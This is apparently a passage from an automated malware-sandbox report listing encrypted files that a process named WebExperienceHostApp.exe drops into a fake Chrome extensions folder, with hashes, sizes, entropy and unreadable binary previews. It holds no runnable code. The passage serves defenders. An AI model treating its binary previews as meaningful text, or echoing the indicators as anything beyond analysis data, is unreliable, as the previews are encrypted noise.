SSDEEP:	1536:bFBX3e/IxRFmOEdU8Z1pgVqC2C/0gGk49jn8uWhTeZjsF9u73OoVRZ:xMQ3fCtZbDC2wutn8ZhTcjs/uT3TZ
MD5:	EB7C720674B853F883C9D6C6325CF5C7
SHA1:	F04B971CC4D1C23BD47BFA771D212C4EB5AE3426
SHA-256:	C22A92D0A3B8B305B124B6972B98B2CD6B98FE4B1A7BA50A1C0E7AA423F46250
SHA-512:	D2CF31C0B7B8309641489AB9B38B6D5F2616F48844DAB66962806CA7F08407478F0A82C138DCD784EF962D8666F3829E0B43B64EC65879FC9E10F0BC3931BCFC
Malicious:	true
Preview:	O..!n./...;F.InU$....\..-..C..c.w...,..W..X_.u....M.7jH7...H....n>.\..#XI...b.4.n....7@..4.4..z'....Hq.W.........Y]e.o0.........7s.....zQ5.<..d...3...S.....`..g....&(}.MSH8J.......,$.......k.....<.).e.O^....3o.PshZ..eLa.S\.7G{.v..(L......=M...`j.;\.k...6...s..6..H.[.^P.R.$...;.#.......Np.....g>.r.%#3.G.a....gN\| ....Z.g2..1....K....Q...OVi..o....V.:...;......s.;.}..w...-.Z..>D5kr.e.{,.$:..1:.q.1K....X...u.i.3kK..../.............:A$.2.....p~......)..P ...S..x.`..D.?.x.a..0`{..E6T.>..K~.L0_ ...er..b..%Ct.X...?.~..M...d[[uq..+z.a.A....\|V<.w....m......u.../z....V......dJ.Y2.......;e.ZZ..?Kp.F4.-....._..R.'$.#.z........Q.(..-&x<.U(....mI.........i.ra.I8 ..J..#..(.+.S.......e9.F]h.........I.M....+c.?.L.j.'.!.n<..&802A...O.g..)....p#..D.PE ....cb....,.8..e.7.0.:......a....,.....n..F..3.e.~{..y8.f=.,.N..:.`3..Z..1.Y.....Y....'?X..Zd..H.p.."..f...4...;Oqf.\|u....>..4..+....P.kJ..$.;W..G....;',.........pW.q.v......U....+......;......N.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.22

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34458
Entropy (8bit):	7.995065071026279
Encrypted:	true
SSDEEP:	768:RdgRHKthT1JBcaEZjGJ3yKoXaEnj/egD2L2RqTfb1:nQqD1oFC7oXa0agSLJb1
MD5:	B5099C89149E1DE924259D2E48288985
SHA1:	7040EA8D49957FA35E5C09AA432556530C0C1A6B
SHA-256:	BAF8E0ACDDFD9ED37F0445328F13CA1BD29525000747504CE0117C827B22A0E5
SHA-512:	A1BF06A87A2A722CE3BB440CFB47C00BAC5B59CBAA109A25C096754491853768628A567EB0D70C1E2201C38DA155BFAE6D9763B50EB2D2A876C6E5AD032E5FAC
Malicious:	true
Preview:	.nv.. .>...r[."MM..9.E.p..%..o...:...[.k...?b...}..n.....+.........(.,.}..r.@.C....~n..<.s..[-YR.........-.p".......].<.>.S. .dI.L....O.i0.....Y..Q5.35=C..}.Y...$.7;.?F.-s......)&.H..8I.\|...](6.MM+..IY.o..V<.X.p?...u...U..5.....,k+tg..1....J.8...@`................."...!?..XV.#....K..I.8.3.>..5.E.&;....8.G..r5.x..zB....i.o.\~....]cff..HO..y..,..;.2jrK..-.!..P..\|%.\|....D>/D...oKG.g...LH.k2HmNoV.......[M\|....7.=`NX...x...g...t..........Z1V..@....t...?j.d.kV...%r7..l.{.(...K...&CDD....%.......d.].i.`K]...."$2C"P.q..m....@....& .^:.y.j.k......,\.....4.Pt.....@.<.....e...j~:dCe.br.C.fEL......C.:%...x-pO.v..68&......cF.S.&J' .%.E..h..H...!q....j...rX... .f.<.&i.(...HH<..T.C.......HDP.ZQL.xP.....b..Y,.c.4..I8... S....\|:r'N..i;.. ...S...a...XB.VG.O.+......?..5.....?..5#...i.~....p.-k...;....;R.....rAI=..eG]...em-.f8.!.Y..1.B.}G...\|.%..N.u.i)...=.}...bc'6...Um.....\|s..N...=Q6.`.Fn.?.. .C!,...9..z..`.K.....Q.....)i. q....>.U\|./s^.....{.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.23

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	95125
Entropy (8bit):	7.998052073557218
Encrypted:	true
SSDEEP:	1536:TDYBzwP6dHbTllbs6r0S2baOVrDykk5D2jRJa/B1QI025:TDnPkH/Q6r0Sn6Wr5aNJc0w5
MD5:	13152C5FA12D4F1599956EF00675BC54
SHA1:	6143073A465946CCF6B7C0B7910936E009E8D702
SHA-256:	43111D74515006A80C5686D339CD9622D6B537F250340EDB46DF29F64027DA8B
SHA-512:	AB913537A38A8195F6C915719F2A845A68E3C51EB1171E2FB564AE5F87F10386D3AE4BAEA3B56D3B7E9A8A63525A23802F811D2AEB854484DAA645D642A987D7
Malicious:	true
Preview:	...N.].M.rr.2n.._.n...;...Z.."E..y.U,..x.E.:.8.r..i..+.?.!.....1.....c..V..!..._......^....V..=...^7..k....<..(.,...$.+....ED..-.[.LcV".T....>..4.9s6..)........-....(r...h.e9...U.2t..W.>.e..l..<z.y.\|;...>..{.h..R?6E.,....e.!?.j...l...o.F...}9....r.9.;....t.2.......C....."1.^#.].E.....M......6..K.h.....".~...Z.d..}...U..4..;y......-y.r&.h.......d.......L..Q.......!.P.6......:S.:.".a.s\aX-.6...B...........^A..q.p...)V....8XL..V....I...5Y.z..J..>.....G....)B.Aa.....v.u..R<.!.w_.I..../>...[>..J.?D..b]...!.YR.,..'Q...3B...Q.....`...^,4..{..U............&.........&Jl.h..[@"E...\..s..\|Q..l...1.6..s...4.g.....vp....J..I.1.R].^.w0,...c.m.x.h0..%..]8C0..>\.V.....F.C...10..T"...[x..h<............Zf.....z~...V...e.Fnx c..k.y&.....o.4E...\.$....?.<L.U.D...Y....0...9Lc.U?....nR".....T .I.W.f..h.4.Kl..p.Ag.h.I..4...<@.\\;w$W?e.n..........5......?...*.....f.S....%^w\........'&..m.......6...W......6...'.bG...X.y.`.e.)..5 .7..G..T..\.N...9.\MmO2$.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.24

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31388
Entropy (8bit):	7.993553977949406
Encrypted:	true
SSDEEP:	768:iJLcWyPWoLfFA1Jf6Vi0NT7q9bzS4qEx2Rs+KE:imWyPVL2fixuq4qoID7
MD5:	B8393402C92EB5B566D316890AD1D19F
SHA1:	A922D2E8A2930CFBC98DA9D220E314015E6F3F5E
SHA-256:	E9EDF0887EA5CE8EFE4A9361559326C3D7ADF381E7F4C604FBE6E6064E2AED9C
SHA-512:	C2FB0E390843C27279B3B69A6AAB58AE9C8BD30D5019170C712C0310F59747DA0710EEB5A869918E0D0FE105E2DD79D1A1C968BCB733542AEFE9B8C2BA7DBE76
Malicious:	true
Preview:	...\|=R.....a...D.c..7.<..p.Y...y.`..@./.=..Sh....-BYP.5.(....8....C.r..B.v........3..8b.y....WZ......j.n2F.9..O$...K.x./R9N.b.G{.\!...=.).,.T6.....xz..@.P..j$....z.0..TYj....W..&.az#..3aZ{+...V.o.;3...$........D.....?>.M..72....4/./t.O.=.5V.l7...........,...6...W.S..^o`....9.e....l.}j...Q..o..D........+...!:..cO...g./. .~!a......?J@....f].%...f.q..d.R9.#.C....O.=...0...<..p.?d....v.....+M).....>.q...4...Jn@y......^v.u.aK...k...!m..s..T..w....[U+.......-....8.!..w;..I.M.I.A..A/.\|...........Fd(.c..r?J.........2...2e.I.t!VS.....R...m........b#.;/d.....L...0.......C ..,z..Uw..{;zT.z........e.Bo.'.."X.w..=.>....s...`-.:.P.A/..}..%}...wcp....0.-..[.T.v.t.v.......~Q......}.M.m.g!.&EQ....+lC...=...)..g.k{t...s..?.m..@).EX..."..k.q.q...g-.(..c..=.C}TUFwC...E.e,w....;.....5p..........(jT.....<..<.....\|.g..8.M.....B...r.hR.G..\|...0F.....[..C.z1...u.S.\V.&....)..J....VL&...iac.....X.ty.0..Y..(*".=O................\..D.v...H.....0a.#.....?.!n9a

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.25

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	72678
Entropy (8bit):	7.997134552088717
Encrypted:	true
SSDEEP:	1536:M35974nemnLM7WH6S46vXHTh7r69Are+cAzEbpCRMFkVW9ZctocVaizqJ:isn5nLcQ7PzdgocAzVMzmTLC
MD5:	F0ED5412A9CACBBCB5CFC09E306C49F0
SHA1:	B2EB294C19FF3104F938ADFC64742013DC9218C6
SHA-256:	41C08A34207748AC2E3877D27276F4DBA0404BFC76664E732887578538C6B026
SHA-512:	4C0FD918118B0445D8D8BC77D52C6D86FDD78312B0FBE476EE3EE604C4E9A432E28A9EB097CF56956E32712CA85628AF8D210B8067176531368EB746237FEE5B
Malicious:	true
Preview:	K..=....I........o..1...R..I..o......,.q..e..k..E.&H..6.dw3a....{.+12\..J.6z..n..c ...Z0..p....U..bTt.^f...".o.w......xX.w;Z...6.....P.8AI..]....n.(.PF.[B.G....}....kBZ....j..wF"+.....d.B..g".A...Ih....o((....(>.S)YD..%....M...t.b2.....].^....N.....{.R(\|.@Z,.5q.i.d.......r.... ...oYTv]a....3..o....sQ....#Gc.^..1nm.....N.<.'.`..y..?.....T..7..q....{..W.`D..(t.O....Y.2..#,...jS%..2....qNr..W...3..6...\|V.....y...kM8.v...<.Ko.U.h..v...o...L.]..[.wwF..vo.Q......i.S..U.Q...!.-.r&0...N.6^q..#..}..... ^R.1P\.I....ko.R.ad.Lr.E.....+.k&.....h...........)....Jy.'...V.)&d.... 9B....t..W......X............U.&...,.@b.~..u..,1..8.0.l...M>..Z ...........\|..j..X.....HOh`zZ......C.D....E..}\FB....!......j._..R........#.O.A..v8.m........ei.<.7*......D......!P.5.hA..,DI.v..dc.....f<.UC?......q...e.2..W..7..O...%...XgTXZ.+.....i[K..p^I.'?H.o9.JIl....."g..6.Y.%....&?O .W.......%.....+ C&..ZsSQP`.....&.(%...K9....3.K.XY.D.S.@s.i.\R7.O.#.Z$.ac.om.A..)...u.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.26

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	97479
Entropy (8bit):	7.997548337897213
Encrypted:	true
SSDEEP:	1536:NU17thO9VWnICXjqrSwuTdegZH4kAMzF3fFaUlwgLtz7s4gbNNGsKltm1+QFlY8F:NUFrvbjESdTogZnzFaYvs4WfGlU+QFlR
MD5:	802E029C20C38A8F328215569A431A4C
SHA1:	964942E05BAF1FD46AE49468C9E60A032EADB7D8
SHA-256:	6B01760D88F92A0E1808178FA67559B1BDA9E6AB0A42D41D3ECE874A371B18B4
SHA-512:	1D4BFB7F3AFC8318DE4449AEABC2F2B0BAE203DB9EFF30E8D8782D1E146E0375815373D5625488574981A76B45C5EBADAF1571E9FFCCA43A3EBB77FD4906C893
Malicious:	true
Preview:	0.......t.].K..b...x.Ow...{.._>....O.....N..v.rp>9.....k...6=._.>..c?.G.O..`s..r..._...{.f...L.....v.....l...S...C.....55..,........t.a...xD....\|...i..e...\|.&8../u...Zh...{.H...!..y..U.c(.e.w....t....;.AN.7#.8/....J.4...c..X.M...g0..g..1.1.....qF...._k].........f...[...7.;...W..[...}..\|..ig...B...8.j.............&r...x{...l.Q.S...p-.E.[.W..+~..x..(5..s1.@.......#RL...!..P..x..A.n.\|.......\|Z.......>.[...,..Z.\|....<.>.^NY...R4.P.%u.^76......ZIq..@SOb#wO...a....j.Z{....6;Hb6..o.\H.,i"X.........r...@....\..q[.&.)...K.N.UD\..%....."..T...I...g..R@f.'v...=..WNsY..}.Q..f....9Z..E......3.}#=.X#Xa..{.,mN."!....T;wQ.p.w...ud..%.I..<'...&.o.zf....R..GQ-...Vf......98..[~....=..A..4.#.3.........#]g.K...(n.A.c%..H.k.X._...-t.K.R......2/..OC.YUS.A/...\|.........TB........0a..kQ6...q.p.Z.O.....<O......si.=...+.......@..n.N[..6,}.....R5...`..g...>..LRL...5.~...-".z.ZH..o.5+.q...$...fUF.I.....{.9n9......2.G./.... nZ...\|b.&.._.M.RO?".......x

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.27

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37155
Entropy (8bit):	7.995000093480915
Encrypted:	true
SSDEEP:	768:F9Wl+QmDeG6AYPOUwVnHv8pD4cHWUhSiQYxPb8fhg:75QmDefAYPPAP8p7BMZYxPehg
MD5:	A2B495E556C29583A5457FDD5056D0F1
SHA1:	B2F34D095B9299E4DF4075686CFF9F6C9FF8F5E2
SHA-256:	228FE92C0C44A266956C9D5F603F3B94B458272D4D5476CE8D25762CA27556CB
SHA-512:	132F82CD3EEACE46872F71074A795363D8C3CA7F6CD0AC3DB78651D91C34AE475D1A7D43B0BF9BE73002A35AA80158C59201E517B1F326B1666EED3578981CA4
Malicious:	true
Preview:	q'.q.GF...x..-5ZG.W.a........C.M....?.A..%d..u.]... O3.%d..so..k.g..O....Z..l...&..7..b...rP.< >k..)..'.C2..zd....._.......[t+`...+.....z.WpU..dN.._f.;di:U.....E1...B.....Q. ..{..fbk.0V....\|.zS...f......i..G_.......%...T>\|..I.+...vj.o.f.?...2...$.....f....h.Z.G.8.@.1..........$k.........{q}N.XK..7.W...........%..=...!.^#.s..@@q.I...L... ..L...H..vr.B'.....[.....Nk./j_a ......\|Z....-I...j+G..e..r+?....\RM.XCv.......BQ..."VO]j.`X.7...i..L.Q.>...o.u.....T......2.7.B..xs.....x8.`.{..t.-....82.a'A......3T.V...C...-\.Gl7.....lC......w.%...TJ.v{M.n....^l6.../..@L.Ys..5.s..Z...\..4...RBG./.K...b.<(..(v.l.cIl.tp%.pB.l....I...$..fI..bu...c...h.[.....m.../1a.[?....Eq.......#.....~8...T.<P.).\|.v.8.\|....hoV...Xpy^..4...>..A......0...~\.........!.....q.l....Kf1,-P...T\|.J6.g,k.HO..+^.. nD]k{.\|...rt.}.<>u.........s.}W.].....(B.TF.~Y...(...u......G...3.X'$:).h3...0Bb.YP...'r..DG$...o. ..[...F.S...Bc.~.7....X.....e.......w.}=wc!Bm..\|..}\^.......N.........:..\|.:....K!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.28

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	85182
Entropy (8bit):	7.997870667848278
Encrypted:	true
SSDEEP:	1536:rFy561FQAL32O4bOPldT13OssxHmwdx8T3ET6OVa6Z:pC61/32ObPll1ess138TyV
MD5:	458232535F5370AEF3143BE37A8BABDA
SHA1:	4C0DDDACA13494FFCF0372911880B9A76D9BD1F8
SHA-256:	BEB29C72B92B1C7693890BB21C11366E6F72DC0AAD8EE9A62AA7532AB7D6CB8A
SHA-512:	B8F300F30F44E9B204AE77C0A00468B8C0A76CA381ACA5C2341998017BCDDAF1020426977915A85DF79B119B9F18C0AA23AC11C75364DC6FF6BE0D3E938662D1
Malicious:	true
Preview:	....!S......\|p...B)q.(...e..:"I...3.....(P.0p.j.[...v/<E`=....8......u.N.\..w.j.0.m.Rg......7^P.Q+......'N.Oi.,..@..[.+.....E.].v.\r.sa..p..\|0..;...}9..%....oY...HN.z...t.x...)..iJ...nz......Eu-..a..Kd.?p......U3....o2.~.q...jS.-.......0V.K3.G.{..k[.1x...u{.Q.E...,?U......@x@..s.... #D....L./.L.2...AS.^P&Pa.Z.L(.'N.Ug..4..;....g.o....]s.vWl7.;r9'R]..,.EU..a.....@.T.gD,.Ha7...UT.gd..D..E?..9......Wi.=.=/...d...5.F/V....0.D..m=H$..._......S....=..p./.L).&..b..t..l..F(6..X.=n\|.c..q.O.h..+.&vn.............:..fm.:.i%6...k..4............2..B`s01...U...2,.y..PD...E...^.0.>.I...I...."X..n...+.........Qn}T.z@.6...<.1...`o...R...u..\|& ....~.H..q#..m..u....P..}.%...h.@o.&.u..^..<..@...]S..Y......aW....eH3.n[...y..#.E."N.$...M.Qd.Wl~9.....^a......y..........5.V.LR\....y@.q.....'.........cw<0...;...T..T1..]\|.f....x./T..fh.a..D.a.g:..2......).Y.d.(.Y..EW...ZR$.Z........B.._.0#....r.7._..J.._%h./...}.T.....H.e.....y>.\.j.J........<....._.W....O..rN...+.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.29

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	28902
Entropy (8bit):	7.993241166696542
Encrypted:	true
SSDEEP:	768:nPJV7SIKkXfYDKe4n4Uf98Upf6oBiEN4CmZu/2nvLxIH:nPJSkXfULUfneEaCmZznzxIH
MD5:	5D9BB698C5A4761DD137044A3BB372BE
SHA1:	1652F8FEFD829B909937B076D2A6742A9F34D1FE
SHA-256:	5967CFE92B9473758E8AE11F1838E948F3EF428727373A991680269DEB8AE15F
SHA-512:	27EB7E41EAD84E537CD072EE15675C7754CBF0B33335046039EB41A02EBDC42EB98510307E57ACE78ED1A3105880AEC91F939DC25A4BD0600B1905F27B085CBD
Malicious:	true
Preview:	......{.gB...R8RW..]..RH,1XQ..T.OJ.CMp............"Ux.{...4....i.)~e.H..3....k.5.;`..{..u..9..V.".O.!..7..$....o.a....&lr.;.... ...z../.v.....2rwS.k{.\.2t..W....6.h_'.....j9.........q.&...WB`.d./..t+?.\|..V...P.......^.F.PF.=.x2m....e.'.w.o...?...O=.....O.....s.).k......E(..v\.U.@......)....Z..F.Pi..c..O...p-.I\|.[.ZJ...x.w....p^q..u-.&.."..>:.)o.C..yK?.....1........k.qO(&........I...x.f....m....&.F.h#....qZ... m.[..;.d..iUD.d.D.\g.\....kXU.>..W..<9.H.?....w)..F..$..&F2cBCTR.....q........$V....t.D.=..LO..pj.b@....?.......a.......5;.....2..O.h.zU.(....x...I....Nj.....&.Dt....W...uBU..X.f=z.f~.[usKw.H....H.x.6B]...Z''3.....%-...;..j...Z.]..s...~....C..Lw....^.XF..@...vN...\..H5j.5....D.....%:...``.L..1.7+..EyI.da.<....w0..[T.......e.i..W.@..i..0......4..T..!`$..]..L...U.........@'Ac.:.$&..y..=.{t..jI.......p.........`!".D`...:i5'QD....?k+EN$........[..w?..._{..5..3.{u.3pY.<t.H1.a]...H..F.'..C._..x....Ho.^u....^.....8.{..u.x.Ap@-n;X

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.3

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90063
Entropy (8bit):	7.997978048003362
Encrypted:	true
SSDEEP:	1536:P/y1Fav6puOSbb2ZPWGaqysLtriHJgbazKp12K2nTDFZi6Z:Xy6v5OSbaZPWGaqTLFegm01g1E6Z
MD5:	4752F4947AC9E08217CB1EEA6E9A1373
SHA1:	028B187AE131E220C73892945BBD47A18DFF75A6
SHA-256:	1978D6F70C6DCF9067D384C2AD2E76B6ACC25E9EA187300B311BF18AD495C305
SHA-512:	ED5E898E56421DE0CA90286A386DF89A83BB4A50CE414AD196D0722D0668B2B2099597F56651CEE22703EAFC8E509EC8858B12494D6CFA1AEC804259088F8B5F
Malicious:	true
Preview:	..+.g.k....?..7m.u..1...(e...}._M.5.6..;....%.D......f.n..b+...?....._..o..?.J".d;}.I^...G.Eul...U...R&7.....B..mW.pT=....k...ZX.)..U.O.f..u...B..`....-;....{6.qv....U.lB..Qy.9..,.\|A...<o$...9.D.7u..q?..@.......{...p^..}.4..Y.%(..wo:`W.j..#.Aox....X..@..N.R7.p ......7mr+......!.....{'f....l.....G...k0,8.....AW.(.E..&.....</...{.M..-..G...3..f.....P..Yv....I".qjT..Md.1(..Y.J>.2........?l...2...)H.Y......3R...R#.i^..%..g8.....u.W...lC..nZ.4.5{S.v...!".....z....}....i....Vl.H...R.J..(W....6.X.$f.#.~.2..{.!..=..J..s....0.E(}.i..Y..QL..O.Q.,..L.,a...?....d...)(/.dYz.JA...;......\.Yw..G/.8\|K}......S...&.?.#M..3...LhBZ?.7..y.:s/U..-ws.....A.B.aVH.hB....~..8..x'X[.Rr6X<}]....._ ...2.A..8..)_J.....n.z..'.R.....\.4...{.p..&....S..0.^zY.M..o..yr..S0.....Z.....".^.a.>.xJ...[.8;(.jl@..`\I..H..r."M.c.S.e...!.R..Q.4.V&@..O\|uk}..,)[..E..C.A..1@c...P...D....FD.....M}[q....h.&.zY.6v......w..Ub...F_S4t.....aa..j.\|%....K...aN......9..!.#....i2.(_..MkZBG.j..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.30

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	85341
Entropy (8bit):	7.997527809534056
Encrypted:	true
SSDEEP:	1536:Yuz802suckUPriZAaueKwpR5vaSySfuV5uLC9S1Ak9n/eV2G5P++JbFCRRqHjLML:zJVxuAauehpDvagfuXsC9Ul2V2G5PjFK
MD5:	FC554A9ED730ECDC0FDAAFD29FE56255
SHA1:	59E7C072A6820E9797B89F8F89A97E452A2025CF
SHA-256:	26B4DBD9AE8A610837D0D73F2E34E22213724A4637FBE6EB861141A1B2DBE8FB
SHA-512:	F687A66CD2DD13502FE6EDCBB2AEEDD8A088F23A38B58301A7AB93F32EF704A8E69357D17825A66E843918A4EF7536A11406B3ED2FCA07FE89C073F4A0579A9A
Malicious:	true
Preview:	<...m....pS...v....K.?.......N.fD`c.'..si....Y......._0/....^...d.4s<..S.W....!7B$...SS(U.E.p..\|..&~)..9.]..... t..mt5V."...vAw..I.....b.....9...I...[.>V..:b....\|~X.>g....qZ..8O......a.Z>......fF.N.}...ST8..p~...@.#f^/.\RU.Q...3..~Sf..J.{5..S.....+......_......(....~?.Qsj..--".j....oP..3@..>$.(.%U.C._'.D...'Cc.y.N\.X..!..q....\...4...3...H....5[.].D....'@.....m...S.=..j.....A.<..k}.YDib\9}..'..a..<\|.:RG.v.'....h.....V........2.[.....'.....E.c...1u..e.4...e)^...q....M.....^...%..L.b7I..-#....d.Sr,.LM.N....kb...s).=_.x.P.'.i.....{_...9...[o4.!.Z.f9.}.\|... c..............J.?.s6.=...T.6.!;.i.,.&...P......N...,.....k6....._.Iy....h3\|....u..C......'_.~..o$vC......f~L.W..8.fa.}.DY..Q...c+.3&c.....v....3.....tb...<.D....!.>.Z.l...6...+.sQ.U.._..m......:.kB.=.../.Q.......]...\...H...,....9\.%.."...:.."...2.....)m&s's....)m6a.z...W....y.t.'.f.A.v..).......v........bqzv.B......rA%p...X...b']y\|.}.-t.s....'.q.{7..-RnV..\|...?.Wh$.J.y...k.7

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.31

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	26428
Entropy (8bit):	7.993304138733814
Encrypted:	true
SSDEEP:	768:qL4N2ZXJNi057IVUHqM/Y2gIOlSeGQCRB82A/9:qdNJXqUHqM/1R8J/9
MD5:	FD11EEE06911152EF148D16414FE4BCB
SHA1:	9040DC2979125A9BF9A707C12814EC1881A314B8
SHA-256:	21FBD87F2D36DDEB97147F07C7C8F7935D073C3FD2ABB6FEF68E7C2B9953D075
SHA-512:	CD00380D7B4293599D4927ED7534ED29116C7CE6DAF61B4678FBAC31C488A9D14C907E0BB50008E458759AB99BAA0ED63C2704494059F8182FA4303CE53A33AF
Malicious:	true
Preview:	...>....6..".k"[..$.+~...\gQ.w$M..Z=.<.7)H......$}z\$;..J.RXt./..4.....6.....V..R....\...#.n}.z...)...[.f..luV....z..'..~......<..C..t...y......M.q.8...._.....3/7.`[.c.P.Dn.\..3...T`.ey.4..Y..=..:.,.e@...q.S8..M,......p...bN..@o..#..n.X..@..t9.\d.W....QE..y!bS.!j.........n....9w...?H.....x.p.,....K21...G.,....O....Q!.DB...)...G....'Z..5j.A.O...6Z.=....../.k`...D...p.......r.KU .A_...[sc...)..nl.l...2....#....".2.(8...d.w6.0.Z...#q,Am..5.l1....y.J5Z.Sy.....@T./.8........O..B.....;.Tl.C.6.JV..4...r\|^[....8@........4.].$J..W&X@.\|..K..2F.[S.X#..E.}..v?..^.w..El..#5..*5c..=.._....oc?UC....`..R.....\|.4...kn...R.B.....C..k.2...$;.....J...!#5^..F.......U..'.....k.'E./...Hs..^Q......o.;%....<...........i.;..D.o,?......Dv.=.L.uW=...K.T./V....28&.X5...K..w.4....m3..H..........T..to).O'..yr1....~.w.P&:Q.H....D..A....P-.x..>{[........;.o..)8K.q=y.4..NN0..C..\.Z.T....{.'...\|."\.ra..c..n..~......... ..}....I$u..g...H..@.&...(^.........K....#..L..3...2m.r...m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.32

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100408
Entropy (8bit):	7.998283449503362
Encrypted:	true
SSDEEP:	3072:Qcq8QiChijKNpxN9PW2ALVQeVUbQDwkdXs:QcqfrGs9+BLfVkCdXs
MD5:	C761409D18F6AD93E7744465D2F63D11
SHA1:	32DDDED664346EC04B7C9F8BFE8D1209F96E27EC
SHA-256:	D25418CB3C0E9E3ABA3A2CDD74E70046481D8E8EA9C57785EAAF7483AC7F30F6
SHA-512:	9D418AB7149A76F9660D77C801F5CE148480BFF19EBB8DDCA0F685595763B4DDC2DA5DAF19D9472EE5F0EA3B52740E0E1D18A92B5019EE85381BE3237256064B
Malicious:	true
Preview:	.....z..Jw.......>'>.9.T[W.W...L.L.........dx=.2..I..=...h.m..ZH....}.p..>.......-g0...e4..%^...4d.:.../.2..V......1{..K..=q@"TU?...P:....(....U........f.2d[..h.Y8.Kl..b.)....xb........A...t......lwT..6].@...`....r-.@.$:.Ei0+....y2Y0..VX$.,o.q(...#X..1.SN..5..........G.O._...~.e..7. #..h...W...\|.R....c..s.x.T..<.).....c+j.w.._.j7..x3.`.S8...U...\|.`z.........;.jX...CM.fooL...Y.mK2'9....a?.z<g.....,W..Z......i2O.?<..\.dS....CO...z7L.B....W...b.2j,.0....aH...)Go.6..0I].8*9<.......-p...t...F.y~q.Au<w.........6d...^VE.9...>.9.9}..M[h.]-.....#C..V..~.FP..5.......II.].i>W.9e~..rOZw]. ......1r.R....E...!...`.....Y...t(.L...D.V.f.k..]\|...0..o`7.-..kl>..t....e<..M.hF...a.$..c.e.SH..../n#e..Y....r...e.hx4...%../{n.`..&J.....$...M.....GN..Z>&..vg......Up3P....q7.]D .h.~@...wK.5.L.Q.M...N#.$8..pr.qGe.....g...d..s..{i....B.N.w..Sx@..,.?N...$HND.j.m.}.U0@..........PEx....f>.\$..<./.}..nE..........-`SR.?.T5.i,.1[sm..}...............4.M-.N...kjj\|.0f.....{

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.33

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	40474
Entropy (8bit):	7.995172259437193
Encrypted:	true
SSDEEP:	768:scW5l/ci9zp5l6W4nCTSNJmbXrTwjiC/BjtPM0N9MAUynixMPBqVWURk:VWL0IjFOObwji0BhxNefo3Pkwck
MD5:	BF23D68C10690EF8B07A8334C20FDBA2
SHA1:	2D0A319C3978349BAC3AF363CA72E9F0CA5AB2B8
SHA-256:	2491C432A3D5ABC0BE492C657B3A74F8A7A2F75BAF3596D1B61373C2614E8611
SHA-512:	936D9FF6779F99CAF536C19217A898666A6087376373575A02254A7774DF821ACD8B3EAD870EF5C8BB84A32ABAC7977BA4CD960D1744BA4B4109211CD3F61C31
Malicious:	true
Preview:	.jgeD..~.......!>I..u...,.y....D.;...m..}...=....u..Z...S.V..w.......7.:..DLy.8N....q.........g.S{........U.]X,.6#/V..[...A...f6..X..._..5..LX..._P.KF...S9d7......].....l.....M.N...h.7...X.0.\..Kh.:.?...o8e.$.f...DQ..x.."f8.k{.n.^...'.Bo..), ..5.O....v.83........[\|/..}...w]...B..l+......h..=..1s>.GA...V.{aBy.xS.y....@..2{..,...`....h.......w..}`z.X#.q..Jn.Y$3..]4.!..7.b.>.Exv..o.d.^..#.k..`..}.#u.'.tR..w.U&%k.?.w2't.(....u0.H.......y9....7.. `.4.7.E#....,-dmg.:..3....Or...+..G..sxqa...zqf_}[^.)..).d.,FL.q#.^....k.'...nZ. .)\|?x......#....[.p.;......rwR..3.......T].../../u.....j7..U........c;D[Zh.I..Wa..<..B.....$..b...0......6.Z...7.....ma.]..Wl...k...2.v.......IH_.\|=.lB"3......."M..zMB.Z....yP...}3z-\j..........U........1.\.J.&....$..(U.j).&Y.N..?.....=..3Y..~...g..[.6.$.[.....\|....l6.I\..s...f..$.Z..km4v,}...u{.. ."......r.k....W.%N....M.q.....?..p...&...\.......a.....=-.T.*.C...3.5.:..$.jT.`.xS........kC`.2e.X.u....X......0.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.34

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98741
Entropy (8bit):	7.998243054332217
Encrypted:	true
